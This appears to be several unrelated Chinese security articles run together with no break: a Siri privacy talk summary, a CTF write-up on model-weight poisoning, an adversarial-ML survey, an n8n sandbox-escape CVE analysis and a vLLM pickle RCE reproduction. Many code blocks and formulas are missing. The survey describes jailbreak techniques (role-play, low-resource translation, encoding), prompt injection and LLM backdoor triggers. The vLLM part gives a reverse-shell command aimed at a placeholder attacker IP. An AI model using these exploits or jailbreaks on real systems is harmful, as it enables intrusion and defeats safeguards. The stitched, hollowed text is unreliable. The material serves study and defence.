引子

云端大模型正日益提升人类生产力，与此同时，端侧智能领域也在不断突破技术瓶颈。现在，端侧大模型已成功落地手机终端，可在本地处理隐私数据，提供总结、命名等实用功能。但端侧智能的能力仍有提升空间，手机暂时无法完全摆脱对云端大模型的依赖，端云协同的范式仍然是未来很长一段时间内端侧智能的主旋律。

在这种背景下，当隐私数据需要上传至云端处理时，手机厂商该如何保障用户的数据安全呢？

让我们看看隐私保护领域的标杆——苹果的解决方案。2024年，苹果就已经推出了隐私云计算（Private Cloud Compute，简称PCC）的概念：

Apple Intelligence 是为 iPhone、iPad 和 Mac 带来强大生成模型的个人智能系统。对于需要使用大模型处理复杂数据的高级功能，我们创建了私有云计算 (PCC)，这是一个专为私有 AI 处理而设计的突破性云智能系统。私有云计算首次将 Apple 设备业界领先的安全性和隐私保护扩展到云端，确保发送到 PCC 的个人数据除了用户本人之外，任何人都无法访问——甚至 Apple 也无法访问。PCC 采用定制的 Apple 芯片和专为隐私保护而设计的强化操作系统构建，我们相信它是迄今为止部署用于大规模云 AI 计算的最先进的安全架构。

看起来这确实是化解隐私数据出端被泄露风险的好办法。但关键在于，这项技术是否已经真正落地到苹果手机里？我们在使用云端的 AI 时，发送出去的内容真的只有我们自己能看到吗？

本文带大家分析 BH USA 2025/Defcon33 的议题：AppleStorm - Unmasking the Privacy Risks of Apple Intelligence，分析Siri 隐私数据出端可能导致的隐私泄露风险。

抓包

想要知道哪些数据被传输到云端了，我们必须能够抓到数据包。

从这里可以看到，苹果 AI 相关服务器的一些主机地址：

大家可能发出疑问：为什么私有云计算和 Siri 是不同的主机地址？隐私云计算不就是为了保护Siri 的上云请求吗？这个问题的答案我们放在后面揭晓。

作者研究发现发送给 guzzoni.apple.com的数据包被做了多层防护，除了证书锁定，苹果还使用了自定义的名为ACE的通信协议，作者花了很大功夫进行协议解析，并且魔改了mitmproxy才成功抓到数据包。工具已开源。

在数据包都能抓到以后，我们来看看不同的场景下，都有哪些数据被 Siri 上传到云端了，以及传输是否做好了加密。

隐私数据出端泄露风险

在开始测试之前，作者预先关闭了系统中的"学习应用习惯以提供智能建议"等个性化功能，避免非必要请求干扰测试，确保在使用 Siri 时捕获的数据包为最小必要集合。

场景一：上云功能

以天气查询为例，询问 Siri What is the weather in Las Vegas?，手机所在的经纬度位置、手机里的天气相关的 APP名称（甚至如果手机里安装了虚拟机，里面天气相关的 APP 都会被找出来）、手机播放列表正在播放的内容信息都会被发送给搜索服务的主机：api-glb-ause1c.smoot.apple.com。此外，手机里当前打开的 APP列表会被发送到听写请求服务器：guzzoni.apple.com。

一个简单的天气询问，提供给云端的信息量已经远远超出于解决该问题所需的内容。

上述这些隐私数据，用户只能控制位置信息是否提供给 Siri，其他的隐私数据都是被悄悄发送到云端了。除了天气搜索外，在使用 Siri 进行计算、在线搜索、文章搜索时，也都会上传类似的数据。

并且，这些请求并没有经过隐私云计算处理，攻击者拦截到数据后可以轻易查看其中的内容。

场景二：端侧功能

对于发送消息、邮件、日历这些端侧功能，Siri 总没有必要再把数据传到云端了吧？

抓包发现，手机里当前打开的 APP列表和当前播放内容的信息仍然会被发送到 guzzoni.apple.com 这个听写服务器。更要命的是，在使用 Siri 发送消息的功能时，像发送 iMessage、发送消息到 WhatsApp，发送的信息的内容以及目标联系人，都会发送给 guzzoni.apple.com 一份。

风险总结如下：

风险来源与消解措施

隐私数据为什么上云？为什么 PCC 没落地？

苹果官方的回应是：上述 smoot 和 guzzoni 服务是给 Siri 用的，而不是 Apple Intelligence，PCC 是用来保护 Apple Intelligence的，像 Writing Tools、Extensions-ChatGPT这些功能。

PS：可是 Siri也能调用 Apple Intelligence的功能，这样同一个 APP有两条上云链路、两套隐私保护政策，本身就很不合理。

使用 Siri 发消息，为什么会传给云端？

实验证明是苹果给开发者提供的 SiriKit导致的问题，苹果后续将考虑修复该问题。

如何消解风险？

guzzoni听写服务对正常功能没有影响，可以屏蔽掉相关的请求（如果可能的话）。

启发

像苹果 Siri这种不安全的传输用户隐私数据的风险，应该是智能手机当前面临的共同问题。不管是为了提高用户的智能体验，亦或仅仅是上传了日志，都有可能在使用 AI 时不安全的上传了用户的隐私数据。

不管是苹果手机还是安卓手机，对系统级别 APP 抓包的管控越来越严格，安全研究人员和普通用户在使用 AI 时，对隐私数据使用透明化的需求越来越高。希望手机厂商在未来做好AI隐私数据使用的透明化和安全保护。

声明

本文所有内容仅供安全研究、教育和防御性安全测试使用。使用者需：

1遵守当地法律法规

2仅在授权环境中进行测试

3不得用于非法入侵或恶意攻击

4对使用后果自行承担责任

参考资料

1PCC 官方资料

2Apple 主机列表

3AppleStorm-Unmasking the Privacy Risks of Apple Intelligence

我们首先用一道题目来引出今天的话题。

0xGame 2025 Week4 - 旧吊带袜天使:想吃真蛋糕的Stocking

题目提供了一个基于PyTorch的CNN图像分类模型 SimpleDessertClassifier,用于识别三种类型的甜点:

​

模型结构:

卷积层: 提取图像特征(3→32→64→128通道)

自适应池化: 统一输出为7×7特征图

全连接层: 128×7×7 → 256 → 128 → 3(三类输出)

在PyTorch的state_dict中,最后一层(输出层)的参数命名为:

'classifier.5.weight': 形状 (3, 128) - 权重矩阵

'classifier.5.bias': 形状 (3,) - 偏置向量

在app.py中的判断逻辑:

​

我们要想拿到flag必须满足一下条件

cake_confidence < 24 - 蛋糕的置信度小于24

poisoned_apple_confidence > cake_confidence - 毒苹果置信度大于蛋糕置信度

模型上传接口

​

检查了文件扩展名，使用了weights_only加载，但是没有验证模型参数的合理性，这就是漏洞点。

根据PyTorch官方文档,load_state_dict要求:

●键名必须完全匹配

●张量形状必须完全匹配

这使得我们可以精确控制模型参数,特别是输出层的参数。

核心思路

1CNN卷积层和中间层难以预测和控制

2但输出层(最后一个Linear层)直接影响三个类别的logits输出

3通过操纵输出层的weight和bias,可以直接控制各类别的置信度

数学原理:

如果我们设:

● weight = 0 (全零矩阵)

●bias = [-10.0, 10.0, 0.0]

则:

●Cake logit ≈ -10.0 (置信度极低)

●Poisoned Apple logit ≈ 10.0 (置信度极高)

●Other logit ≈ 0.0 (置信度中等)

这样就满足了获取flag的条件。

神经网络输出层机制

在PyTorch中,未经softmax的输出称为logits:

Softmax转换:

当差异较大时:

● logit_poison = 10.0 → exp(10) ≈ 22026

● logit_cake = -10.0 → exp(-10) ≈ 0.000045

●poison_confidence ≈ 99.99%

●cake_confidence ≈ 0.0002%

满足 cake_confidence < 24 和 poisoned_apple_confidence > cake_confidence。

exp

第一次遇到模型污染攻击的题目，我们来总结一下AI样本对抗的一些内容和知识点。

一、对抗性威胁

1.1 问题背景

2014年，Szegedy等人首次发现了一个令人震惊的现象：深度神经网络对输入数据的微小扰动异常敏感[1]。通过在图像上添加精心设计的扰动，这些扰动在人类观察者看来几乎不可察觉，却能让分类器的准确率从90%以上骤降至接近0%。这一发现揭开了对抗性机器学习研究的序幕。

更令人担忧的是，对抗样本具有迁移性（Transferability）——在某一个模型上生成的对抗样本，往往能够成功攻击其他架构完全不同的模型。这一特性使得对抗攻击在实际应用场景中构成严重威胁。

1.2 现实威胁案例

自动驾驶系统：研究者通过在停车标志上添加精心设计的贴纸，成功欺骗目标检测模型将其识别为限速标志[2]。这种物理对抗攻击直接威胁道路交通安全。

人脸识别系统：通过佩戴特殊设计的眼镜框，攻击者可以绕过基于深度学习的人脸验证系统[3]。这种对抗性眼镜的图案对人类观察者而言只是普通的装饰，但对神经网络而言却是致命的扰动。

恶意软件检测：对抗样本技术已被应用于恶意PDF文件的生成，使得能够绕过基于机器学习的检测系统[4]。这表明对抗性威胁不仅限于视觉领域。

1.3 对抗样本的定义

二、对抗样本的产生机理

2.1 线性假设解释

2.2 决策边界理论

从决策边界（Decision Boundary）的角度看，对抗样本反映了模型决策边界的扭曲特性。在高维空间中，决策边界的复杂度远超人类直觉。

研究表明，深度神经网络的决策边界呈现出"指状突起"（Finger-like protrusions）结构[6]。这些细长的突起深入到各个类别的区域，使得在任何数据点附近都存在通往其他类别的低扰动路径。

2.3 流形视角

另一种解释基于数据流形（Manifold）理论。自然图像在高维像素空间中实际上分布在一个低维流形上。深度神经网络学习的是这个流形上的概率分布。

对抗样本位于流形之外，但非常接近流形表面。模型在流形之外的区域行为不可控，容易被扰动误导。这类似于"分布外泛化"（Out-of-Distribution Generalization）问题。

三、经典攻击算法详解

3.1 梯度类攻击方法

3.1.1 FGSM（Fast Gradient Sign Method）

FGSM是最早的一阶攻击方法，由Goodfellow在2015年提出[5]。核心思想是沿损失函数的梯度方向进行最大化扰动：

FGSM的优势：

●计算高效，仅需一次前向和反向传播

●扰动可控

●在黑盒场景下具有较好的迁移性

局限性：

●单步攻击容易被对抗训练防御

●扰动幅度受限时成功率较低

3.1.2 I-FGSM（Iterative FGSM）

I-FGSM通过多次迭代应用FGSM，每次迭代使用较小的步长：

I-FGSM显著提升了攻击成功率，但迁移性有所下降。

3.1.3 MI-FGSM（Momentum I-FGSM）

为提升迁移性，Dong等人引入动量机制

动量机制有助于：

●跨越局部极值

●稳定优化方向

●提升不同模型间的迁移性

3.1.4 PGD（Projected Gradient Descent）

PGD被Madry等人视为对抗鲁棒性的"基准攻击"[8]。算法框架：

PGD的关键创新在于随机初始化，这使得攻击能从不同起始点探索决策边界，显著增强了攻击效果。Madry等人证明，对抗训练若能防御PGD攻击，通常也能防御其他一阶攻击。

3.2 优化类攻击方法

3.2.1 C&W攻击（Carlini & Wagner Attack）

Carlini和Wagner提出的优化攻击[9]被认为是当时最强的白盒攻击方法。核心思想是将对抗样本构造转化为约束优化问题

C&W攻击的三种变体：

● C&W L0：最小化修改像素数量

● C&W L2：最小化欧氏距离

● C&W L∞：最小化最大像素变化

C&W攻击突破了当时多数防御方法，包括 Defensive Distillation（防御蒸馏）。

3.2.2 EAD（Elastic-Net Attack to DNNs）

Chen等人提出基于Elastic Net正则化的优化框架

3.3 黑盒攻击方法

3.3.1 基于迁移性的黑盒攻击

利用对抗样本的迁移特性，攻击者可以在本地模型上生成对抗样本，直接用于攻击远程目标模型。

提升迁移性的策略：

● 使用集成模型（Ensemble）作为替代模型

● 引入数据增强（Data Augmentation）

● 使用动量机制稳定优化

3.3.2 基于查询的黑盒攻击

当无法获得目标模型的梯度信息时，可采用基于优化的查询方法。

NES（Natural Evolutionary Strategy）攻击
通过自然进化策略估计梯度：

Boundary Attack
从随机噪声出发，沿决策边界逐步逼近目标样本，保持对抗性同时减小扰动。

SPSA（Simultaneous Perturbation Stochastic Approximation）：
使用同时扰动随机近似估计梯度，每次仅需两次查询即可获得梯度估计。

3.4 物理对抗攻击

3.4.1 数字域到物理域的挑战

将数字域对抗样本应用到物理世界面临两大挑战：

1 光照变化：拍摄条件的变化导致实际输入与预期不一致

2 视角变换：拍摄角度影响对抗扰动的作用

3.4.2 典型物理攻击方法

RP2（Robust Physical Perturbations）[13]：
通过在不同光照和角度下优化，生成具有物理鲁棒性的对抗贴纸。关键是在优化过程中引入环境变化的模拟：

对抗性补丁（Adversarial Patches）[14]：
Brown等人提出生成任意形状的图像补丁，无论贴在图像何处都能触发攻击。优化目标是：

通过期望-最大化（Expectation-Maximization）算法求解。

四、新兴攻击前沿

4.1 针对Transformer的对抗攻击

Vision Transformer（ViT）的兴起带来了新的攻击向量。研究表明，ViT的自注意力机制（Self-Attention）存在特殊脆弱性[15]。

Patch-wise攻击：
不同于CNN的像素级攻击，ViT的对抗扰动可以针对Image Patch层面构造：

Token级扰动：
在语言模型中，针对输入Token的嵌入向量进行优化，而非原始文本。

4.2 视觉-语言多模态攻击

大型视觉-语言模型（如CLIP、GPT-4V）的对抗研究成为热点[16]。

跨模态迁移攻击：
利用图像和文本模态间的对齐关系，通过修改一模态影响另一模态的表征：

链式攻击（Chain of Attack）
CVPR 2025的研究表明，VLM比单一语言模型更易受攻击，原因在于视觉模态对细微扰动的敏感性。攻击策略为：

1在图像空间生成对抗扰动

2通过视觉编码器传递到联合嵌入空间

3影响跨模态注意力机制

4最终导致语言输出错误

4.3 后门攻击（Backdoor Attack）

后门攻击不同于前述的对抗样本，它在训练阶段植入恶意行为。

触发器设计：
常见的触发器模式：

●图像角落的特定图案

●隐写术嵌入的隐蔽信号

●语义级触发（如"特定物体+特定背景"）

BadNets攻击
通过在训练集中注入带触发器的样本，使得模型在测试时遇到触发器即输出攻击者指定的类别。

隐式后门攻击：
使用正则化方法使后门激活模式与正常激活模式难以区分：

4.4 数据投毒攻击

数据投毒攻击通过污染训练数据来植入后门或降低模型性能。

标签翻转攻击：
将部分训练样本标签改为错误类别，导致决策边界偏移。

清洁标签攻击
更隐蔽的方法，保持标签正确但选择靠近决策边界的困难样本进行微小扰动：

4.5 图像对抗样本的不可感知性度量

为了更精确地量化对抗扰动的不可感知性，研究者提出了多种度量方法：

五、大语言模型对抗攻击

随着ChatGPT、GPT-4等大语言模型的广泛应用，LLM的对抗安全问题成为研究热点。与传统CV领域的对抗样本不同，LLM面临独特的挑战和攻击方式。

5.1 LLM对抗攻击的特点

离散输入空间：
语言模型的输入是离散的token序列，无法直接应用连续优化方法：

语义约束强：
扰动后的文本必须保持语法正确和语义连贯，这比图像扰动约束更强。

黑盒场景为主：
大多数LLM通过API提供服务，攻击者只能访问输入输出接口。

5.2 提示注入攻击（Prompt Injection）

提示注入是目前LLM面临的最严重安全威胁之一。

直接注入：
通过精心设计的提示词覆盖系统指令：

间接注入：
将恶意指令隐藏在看似正常的内容中：

多轮注入：
通过多轮对话逐步引导模型突破安全限制：

形式化定义

5.3 对抗性提示生成

基于优化的方法：

GCG（Greedy Coordinate Gradient）
通过贪婪坐标梯度搜索最优后缀扰动：

算法框架：

基于搜索的方法：

遗传算法
将提示词视为基因序列，通过变异、交叉、选择进化：

● 变异：随机替换token或同义词替换

● 交叉：组合两个成功的提示词片段

● 选择：保留攻击成功率高的个体

强化学习方法：
将对抗提示生成建模为序列决策问题：

5.4 越狱攻击（Jailbreaking）

越狱攻击旨在绕过LLM的安全护栏。

角色扮演攻击：
通过设定角色场景规避安全限制：

翻译攻击：
利用语言差异绕过过滤器：

●将恶意请求翻译为低资源语言

●通过LLM处理后再翻译回原语言

●某些语言的语义表达可能未被安全训练充分覆盖

编码攻击：
将指令编码为特殊形式：

●Base64编码

●ASCII/Unicode字符

●摩斯电码

●凯撒密码

示例：

组合攻击：
结合多种技术的混合攻击：

1使用角色扮演设定上下文

2通过编码隐藏真实意图

3利用多轮对话逐步引导

4添加干扰token迷惑检测器

5.5 LLM后门攻击

触发器植入：
在训练阶段或微调阶段植入后门：

特定词触发：
在输入中包含特定关键词时触发恶意行为：
$$P(恶意输出 | 输入 + 触发词) approx 1$$

句法结构触发：
特定的句子结构触发后门：

隐式触发
使用难以察觉的触发器，如：

●特殊标点符号组合

●文本末尾的空白字符

●Unicode零宽字符

训练数据投毒：

5.6 针对RAG系统的对抗攻击

检索增强生成（RAG）系统的攻击向量：

检索阶段攻击：
构造文档使得被错误检索：

生成阶段攻击：
在被检索的恶意文档中植入误导信息，使LLM生成错误内容。

多跳推理攻击：
针对需要多步推理的RAG系统，在某个中间步骤注入错误信息，影响最终结论。

5.7 LLM对抗攻击评估

攻击成功率：

查询效率：
平均需要的查询次数或轮次。

文本质量：
评估对抗提示的自然度和流畅度，使用：

●困惑度（Perplexity）

●人工评估

●GPT-4等作为裁判

覆盖度：
攻击方法对不同类型任务的有效性：

●代码生成

●有害内容生成

●隐私信息泄露

●虚假信息传播

六、扩散模型与生成式AI的对抗研究

生成式AI的快速发展带来了新的安全挑战。扩散模型作为当前最强大的生成模型，其对抗性研究成为前沿方向。

6.1 扩散模型原理回顾

6.2 针对扩散模型的对抗攻击

6.2.1 图像到图像生成的对抗攻击

文本引导图像编辑攻击[35]：
通过对抗性文本提示生成恶意图像：

目标优化：
$$max_{delta} mathbb{E}[ ext{损失函数}( ext{生成图像}, ext{目标属性})]$$

例如：

潜在空间对抗扰动：
在扩散模型的潜在空间注入扰动：

影响后续的去噪过程，导致生成偏离预期。

6.2.2 针对图像生成的不可见水印攻击

水印移除攻击：
通过添加精心设计的扰动移除生成图像中的水印：

水印伪造攻击：
在真实图像中添加伪造的水印，使其被误判为AI生成。

6.2.3 反向攻击与隐私窃取

成员推断攻击：
判断某样本是否在训练集中：

训练数据提取[36]：
通过逆向扩散模型恢复训练数据：

攻击算法：

模型反演：
从模型输出恢复敏感训练信息，特别是人脸等敏感数据。

6.3 生成对抗网络的对抗性研究

6.3.1 GAN的脆弱性分析

6.3.2 模型窃取攻击

6.4 生成式AI的防御策略

6.4.1 对抗训练 for 生成模型

鲁棒去噪器训练：

防御性蒸馏：
使用高温蒸馏平滑生成模型的决策边界。

6.4.2 水印与版权保护

不可见水印技术[37]：

基于频域的鲁棒水印：

1将水印嵌入到图像的DCT/DWT系数中

2水印对常见的图像处理具有鲁棒性

3可通过统计检测验证水印存在

基于优化的水印：

神经网络水印：
在模型参数中嵌入水印：

●触发器集：特定输入产生特定输出

●参数 embedding：将水印编码到权重矩阵

6.4.3 生成内容检测

基于检测器的识别：

特征包括：

●频域统计特征

●局部纹理模式

●深度特征异常

零样本检测：
利用零样本学习无需训练即可检测：

●计算图像在CLIP等模型中的特征分布异常

●使用困惑度等指标

多模态检测：

6.5 AIGC安全事件与伦理讨论

Deepfake与虚假信息：

●政治人物视频伪造

●商业诈骗

●个人名誉损害

版权侵权争议：

●AI训练数据的合法性

●生成内容的版权归属

●风格模仿的法律边界

内容审核挑战：

●海量生成内容的审核难度

●跨平台监管的复杂性

●技术对抗与军备竞赛

七、深度对抗鲁棒性理论分析

7.1 对抗样本的几何视角

7.1.1 决策边界的曲率分析

从微分几何角度，决策边界的曲率决定了对抗样本的易攻击性。

研究表明，深度神经网络的决策边界具有极大的负曲率区域，导致对抗样本的存在。

7.1.2 决策边界的分形维度

决策边界的盒计数维度（Box-counting Dimension）：

实验表明，深度神经网络的决策边界维度接近输入空间维度，这是对抗样本存在的根本原因之一。

7.1.3 余度假设与线性可分性

余度假设（Excess Capacity Hypothesis）：
神经网络参数数量远超训练样本数，导致存在大量决策边界可实现零训练误差。

高VC维意味着模型可以记忆训练数据而非学习泛化规律，决策边界在数据点之间扭曲形成对抗样本。

7.2 泛化理论与鲁棒性

7.2.1 泛化界与鲁棒性

7.2.2 分布鲁棒优化

7.3 信息论视角

7.3.1 互信息与特征学习

7.3.2 信息瓶颈的鲁棒性解释

从信息论角度，对抗样本的存在是因为模型学习了对分类任务无关的特征。IB理论表明，最优表示应该丢弃输入中的"噪声"（包括对抗扰动），只保留与任务相关的信息。

7.4 对抗样本的因果解释

7.4.1 相关性与因果性

传统深度学习学习的是特征与标签之间的统计关联，而非因果关系。

虚假相关（Spurious Correlation）：
例如：训练集中"雪地"背景与"狼"标签高度相关，导致模型对"雪地上的哈士奇"误分类。

对抗样本利用了这些虚假相关特征。

7.4.2 因果表示学习

7.5 可证明的鲁棒性下界

7.5.1 准确率-鲁棒性权衡的理论分析

7.5.2 神经正切核（NTK）视角

NTK理论表明：

●标准训练的模型在数据点附近拟合迅速

●但在远离数据点的区域泛化能力差

●对抗样本恰好位于训练数据流形的"空隙"中

八、端到端实战案例

本章节通过具体案例展示对抗样本攻防的完整流程，从代码实现到结果分析。

8.1 图像分类模型对抗攻击实战

8.1.1 环境准备

8.1.2 加载预训练模型

8.1.3 FGSM攻击实现

8.1.4 PGD攻击实现

8.1.5 C&W攻击实现

8.1.6 可视化对比

8.2 对抗训练完整流程

8.2.1 基础对抗训练

8.2.2 TRADES对抗训练

8.3 LLM对抗攻击实战

8.3.1 提示注入攻击示例

8.3.2 GCG攻击算法实现

8.4 扩散模型对抗攻击

8.5 攻击效果评估与对比

九、评估指标与基准

9.1 攻击能力评估

9.1.2 扰动幅度

9.1.3 查询复杂度（Query Complexity）

9.1.4 迁移性

9.2 防御能力评估

9.2.1 鲁棒准确率（Robust Accuracy）

9.2.2 准确率-鲁棒性权衡

9.2.3 认证半径（Certified Radius）

9.3 常用数据集

9.4 自动化评估工具

Foolbox：
Python库提供统一接口实现多种攻击算法：

ART（Adversarial Robustness Toolbox）：
IBM开发的对抗鲁棒性工具箱，提供攻击、防御、评估的完整流程。

CleverHans：
Goodfellow等人开发的早期对抗攻击库，提供FGSM、JSMA等经典算法实现。

十、开放问题与未来方向

10.1 准确率与鲁棒性的根本矛盾

经验表明，提升模型鲁棒性往往以牺牲标准准确率为代价。Schmidt等人从信息论角度证明，在高维数据分布下，实现高准确率和高鲁棒性需要指数级样本复杂度[30]。

这提示可能需要：

● 新的学习范式：超越纯监督学习

● 先验知识注入：利用人类视觉先验

● 因果推理：从相关性转向因果性

10.2 大模型的对抗鲁棒性

随着GPT-4、CLIP等大模型的兴起，新问题涌现：

计算成本：对大模型进行PGD攻击或对抗训练计算开销巨大。研究方向：

●参数高效微调（PEFT）结合对抗训练

●LoRA（Low-Rank Adaptation）在对抗场景的应用

●梯度累积与分布式优化

黑盒迁移攻击：大模型API只提供输入输出接口，如何设计高效查询攻击？

10.3 生成式AI的对抗问题

扩散模型（Diffusion Models）和生成对抗网络（GAN）的对抗研究：

扩散模型反向攻击：
通过优化去噪过程，从模型中恢复训练数据隐私。

生成模型的版权保护：
对抗水印技术保护生成内容不被盗用。

10.4 多模态与联邦学习的安全性

跨模态对抗传播：
视觉-语言-音频多模态模型中，一模态的扰动如何影响其他模态？

联邦对抗学习：
在分布式训练场景下，如何防御恶意客户端的对抗性投毒？

10.5 可证明鲁棒性

现有的经验性防御（如对抗训练）只能提供经验保证。研究方向：

形式化验证：
使用SMT求解器对小型网络进行精确验证。

凸松弛：
将非线性激活函数凸化，得到鲁棒性的可证明上界。

随机平滑扩展：
将随机平滑理论扩展到更复杂的数据分布和网络架构。

10.6 对抗样本的双重性研究

最新研究开始探索对抗样本的积极意义：

数据增强：
利用对抗样本扩充训练集，提升模型泛化能力。

可解释性：
对抗样本揭示模型决策逻辑，帮助理解黑盒模型。

对抗性调试：
通过生成对抗样本发现模型缺陷，指导改进。

10.7 2023-2025最新研究进展

10.7.1 自动对抗攻击（AutoAttack）[39]

Croce和Hein提出的AutoAttack是一个自适应攻击框架，自动选择最优攻击组合：

核心思想：

●使用多种攻击方法（APGD-CE, APGD-DLR, FAB, Square）

●通过自适应策略选择最有效的攻击

●提供更可靠的鲁棒性评估

算法流程：

10.7.2 对抗性微调（Adversarial Fine-tuning）[40]

针对预训练大模型的对抗性微调方法：

方法：

●在预训练模型基础上进行对抗性微调

●使用较小的学习率和扰动预算

●仅微调部分层（如最后几层或注意力层）

优势：

●降低计算成本

●保留预训练知识

●提升下游任务的鲁棒性

10.7.3 基于提示的防御（Prompt-based Defense）[41]

针对LLM的防御新方法：

系统提示工程：

红队测试（Red Teaming）：

●组建专业红队进行对抗性测试

●使用自动化工具生成对抗样本

●建立攻击-防御迭代循环

10.7.4 多模态对抗研究进展

CLIP模型的脆弱性[42]：
研究发现视觉-语言预训练模型对特定扰动高度敏感：

●视觉扰动向文本空间的迁移

●跨模态对抗样本的构造

●零样本分类的鲁棒性分析

扩散模型的鲁棒性[43]：
针对Stable Diffusion等模型的攻击：

10.7.5 物理对抗攻击新进展

3D打印对抗物体[44]：
通过3D打印生成物理对抗物体：

●优化物体的3D几何结构

●考虑不同光照和角度

●实际测试验证攻击效果

对抗性纹理（Adversarial Textures）：
将对抗扰动应用到现实世界的纹理：

●服装图案

●车辆涂装

●建筑外观

10.7.6 量子计算与对抗鲁棒性

新兴研究方向：

量子对抗攻击：
利用量子算法加速对抗样本生成：

●量子梯度估计

●量子优化算法（QAOA）

●量子机器学习模型的鲁棒性

后量子密码学与AI安全：

●抗量子攻击的神经网络

●量子密钥分发与模型保护

10.7.7 对抗样本的法律与伦理框架

监管政策：

●欧盟AI法案对对抗鲁棒性的要求

●NIST AI风险管理框架

●ISO/IEC AI安全标准

负责任的AI开发：

●对抗鲁棒性作为AI安全指标

●红队测试作为标准流程

●透明度和可解释性要求

十一、实践建议与最佳实践

11.1 对抗训练实施指南

11.1.1 基础配置

11.1.2 高级技巧

早期停止（Early Stopping）：
监控验证集鲁棒准确率，避免过拟合。

课程学习（Curriculum Learning）：

自适应攻击强度：
根据当前模型鲁棒性动态调整epsilon。

附录：快速参考

A.1 主要攻击算法对比

A.2 主要防御方法对比

A.3 常用扰动预算值

漏洞介绍

通过字符串格式化和异常处理，攻击者可以绕过 n8n 的 Python 任务执行器沙箱限制，在底层操作系统中运行任意的、不受限制的 Python 代码。该漏洞可通过“代码块”功能被拥有基本权限的已验证用户利用，并可能导致运行在“内部”执行模式下的 n8n 实例被完全接管。如果实例运行在“外部”执行模式下（例如，使用 n8n 的官方 Docker 镜像），任意代码执行将发生在一个 Sidecar 容器内，而非主节点，这大大降低了漏洞的影响。

漏洞影响

CVSS评分：8.5（高）

版本：n8n < 1.123.14，2.0.0 <= n8n < 2.3.5，2.4.0 <= n8n < 2.4.2

影响：

"内部"执行模式：全面接管n8n实例

"外部"执行模式（Docker Sidecar）：限制在Sidecar容器内，影响较小

漏洞分析

1.用户输入

用户在n8n工作流界面的Python代码节点输入：

​

2.后端验证绕过

validate() 检查用户代码

通过BLOCKED_ATTRIBUTES检查属性名是否含有违法属性

但是在BLOCKED_ATTRIBUTES列表中没有'obj'，这就导致用户输入的代码中不会检测'obj'属性

这里只检查直接的__import__()调用，不会检查通过字符串格式化执行的__import__，这就导致了用户输入的代码存在这个也不会爆：

此时，用户的代码就过了安全检测

3.漏洞触发

这里就是整个漏洞最终之地

该段代码将用户的输入进行包装

这里将包装好的字符串代码转换为Python字节码对象：

wrapped_code：包含 _user_function() 定义的字符串

EXECUTOR_ALL_ITEMS_FILENAME：一个常量（通常是"<all_items>"），作为代码的“文件名”出现在错误信息中

"exec"：编译模式，表示编译的是可执行代码块（而非单个表达式）

这个 globals 字典是沙箱安全机制的核心，它定义了用户代码能访问和不能访问的一切。它通过以下方式构建了一个受控的执行环境：

_filter_builtins：调用该字典进行过滤

_items 和 _query：只传递数据，不传递引用

自定义的 print 函数：

确保所有print参数都能安全地通过multiprocessing管道和WebSocket传输

输出被收集到print_args列表，可以：返回给前端界面显示，进行安全审查和日志记录，限制输出数量

在受限制的globals中执行代码

由于对于默认过滤字典攻击者可以通过e.obj绕过该过滤，从而使得用户可以得到未过滤的__builtins__，__import__，使得_filter_builtins无用了

执行完成后，从globals中提取用户代码的输出：

EXECUTOR_USER_OUTPUT_KEY 是 _user_output（前面包装时赋值的变量名）

现在，漏洞在后端的调用链变得清晰明了：

通过用户输入，task_analyzer.py文件未过滤obj，导致安全验证被绕过，然后到task_executor.py文件漏洞触发点的过滤也被e.obj绕过，最终攻击者使用e.obj进行属性访问导致RCE

官方修复

对constants.py黑名单添加obj

参考

https://github.com/n8n-io/n8n/commit/b73a4283cb14e0f27ce19692326f362c7bf3da02

https://www.venustech.com.cn/new_type/aqtg/20260119/29101.html

https://github.com/n8n-io/n8n/blob/n8n%402.2.5/packages/%40n8n/task-runner-python/src/task_executor.py

https://nvd.nist.gov/vuln/detail/CVE-2026-0863

漏洞描述

CVE-2025-47277 是 vLLM 项目中的一个 远程代码执行（RCE）漏洞，源于其使用PyNcclPipe模块时，未经验证地反序列化来自网络的数据，攻击者可通过构造恶意 pickle 数据包，在服务器端执行任意代码。该漏洞严重性等级为 Critical。

影响范围

漏洞环境搭建

可以在本地搭建一个复现环境：

●Python ≥ 3.8

●vLLM == 0.8.3（或受影响版本）

●PyTorch

​

代码解读

​

PyNcclPipe：vLLM 的分布式 KV 缓存传输模块，用于节点之间传输 tensor 数据。

KVTransferConfig：用于配置 KV 缓存传输参数，例如端口、IP、rank 等

​

kv_ip：本地监听 IP，接收其他节点发来的 tensor 数据。127.0.0.1 代表只监听本地（攻击时需开放公网 IP）。

kv_port：网络监听端口（服务端口），攻击者通过该端口发送恶意数据。

kv_rank：当前节点在分布式系统中的编号，0 表示主节点。

kv_parallel_size：并行传输的节点数量，这里设为 1，表示单连接通信。

kv_buffer_size：每次接收 tensor 的 buffer 大小。

kv_buffer_device：buffer 存储设备，设为 "cpu" 表示张量数据缓存在 CPU 上。

​

创建一个 PyNcclPipe 对象，它封装了底层 TCP 通信逻辑，用于从其他节点接收数据。local_rank=0 表示当前节点在通信中的本地编号。

​

这是漏洞的触发点！recv_tensor() 内部会调用 recv_obj() 来从 socket 中接收序列化对象。

漏洞分析

在pynccl_pipe.py中调用了recv_obj()方法

而recv_obj()方法中刚好对传入的字符串进行pickle反序列化

漏洞复现

攻击脚本

代码分段解读：

这里引入 StatelessProcessGroup，这是 vLLM 中用于节点间通信的一个工具类，封装了 TCP 通信逻辑。

这是攻击的核心：

__reduce__() 是 Python pickle 模块在反序列化对象时调用的特殊方法。它的返回值告诉 pickle.loads() 如何还原一个对象。这里它返回的是 (os.system, ('whoami',))，反序列化时会执行 os.system('whoami')。这里可以把 'whoami' 换成任意命令，例如 bash -i >& /dev/tcp/attacker_ip/port 0>&1 以反弹 shell。

这行代码创建了一个客户端通信节点：host：目标服务监听地址（本地测试用 127.0.0.1），port：目标服务监听端口（通常为服务端的 KV 服务端口），rank：当前通信节点的编号（1 表示攻击节点），world_size：分布式训练的总节点数（2 表示 2 个节点通信）

这个接口实际上是将攻击者作为一个“合法”节点加入通信组。

通过 send_obj() 向 rank=0 的节点发送序列化后的 Evil 对象。服务端在执行 recv_obj() 时，会执行 pickle.loads() 对这个对象反序列化。从而触发 Evil.__reduce__()，间接调用 os.system('whoami')。

运行后，目标机器会执行whoami命令，在实战环境下可以反弹shell

漏洞修复

vLLM 在 0.8.5 版本中已修复此漏洞：

修复内容：

● 强制TCPStore使用指定私有地址进行绑定（防止监听所有接口）

● 改进通信逻辑，防止未经校验的pickle.loads被直接调用

防护建议：

●升级 vLLM 至 ≥ 0.8.5

